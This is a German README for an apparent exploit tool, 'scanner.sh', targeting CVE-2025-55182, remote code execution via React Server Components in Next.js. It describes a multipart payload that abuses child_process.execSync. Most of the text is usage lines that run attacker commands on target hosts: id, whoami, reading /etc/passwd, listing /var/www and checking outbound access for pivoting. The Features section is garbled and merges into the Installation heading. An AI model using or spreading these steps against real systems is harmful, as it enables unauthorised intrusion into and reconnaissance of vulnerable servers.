
POC-CVE-2025-55182
CVE-2025-55182 Advanced Scanner
Ein voll ausgestattetes Exploitation-Tool für CVE-2025-55182 – Remote Code Execution über React Server Components in Next.js.
Der Scanner erstellt automatisch den Multipart-Payload und missbraucht process.mainModule.require('child_process').execSync(), um auf verwundbaren Instanzen beliebige Betriebssystembefehle auszuführen.
Features
https:// wird angewendet, falls fehlend)Installation
chmod +x scanner.sh
Verwendung
# Standard-Scan (führt 'id' aus)
./scanner.sh -d vulnerable-app.com
# Benutzerdefinierte Befehlsausführung
./scanner.sh -d vulnerable-app.com -c "whoami"
# Mit explizitem Protokoll
./scanner.sh -d http://localhost:3000 -c "cat /etc/passwd"
Optionen
Beispiele
# RCE verifizieren
./scanner.sh -d shop.example.com
# System-Fingerprinting
./scanner.sh -d shop.example.com -c "uname -a"
# Beschreibbare Pfade auflisten
./scanner.sh -d shop.example.com -c "ls -la /var/www"
# Pivot-Hilfe – ausgehenden Zugriff prüfen
./scanner.sh -d shop.example.com -c "ping -c 4 google.com"
Kontaktieren Sie mich gerne unter mailto:[email protected]